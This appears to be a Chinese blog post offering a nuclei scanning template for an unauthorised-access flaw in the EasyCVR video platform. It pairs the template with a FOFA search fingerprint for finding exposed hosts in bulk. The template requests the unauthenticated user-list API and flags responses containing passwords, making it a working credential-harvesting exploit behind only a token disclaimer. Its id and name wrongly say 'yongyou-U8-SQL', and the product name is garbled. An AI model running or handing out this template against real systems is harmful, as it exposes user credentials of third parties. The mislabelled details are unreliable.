网络安全 --- nuclei自动化检测漏洞脚本编写用例
声明 : 只为自己分享技术安全研究,禁止用于其他用途,后果与本人无关。
下面是EasyCCVVRR的未授权访问漏洞,
fofa指纹:app="EasyCVR-视频管理平台"
批量测试漏洞脚本如下:
id: yongyou-U8-SQL info: name: yongyou-U8-SQL author: msk severity: high http: - raw: #采用原始http格式 - |+ #保留原始换行符 GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1 #发送get类型的请求。这里的链接是未授权访问 Host: {{Hostname}} #替换为命令行中提交域名,比如 http://www.xxx.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: token=3lb8MqLSg Cache-Control: max-age=0 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 matchers: - type: dsl #表示使用DSL(领域特定语言)来定义匹配规则。 dsl: - contains_all(body,"Password") #核心匹配规则,http响应体中包含Password字符串就是有漏洞,会输出到命令行中
· DeepSeek “源神”启动!「GitHub 热点速览」
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· C# 集成 DeepSeek 模型实现 AI 私有化(本地部署与 API 调用教程)
· DeepSeek R1 简明指南:架构、训练、本地部署及硬件要求
· NetPad:一个.NET开源、跨平台的C#编辑器
2021-07-11 什么是家用路由器,带你重新认识一下
2021-07-11 科技圈为什么老是收购
2021-07-11 为什么安卓不能像windoows那样安装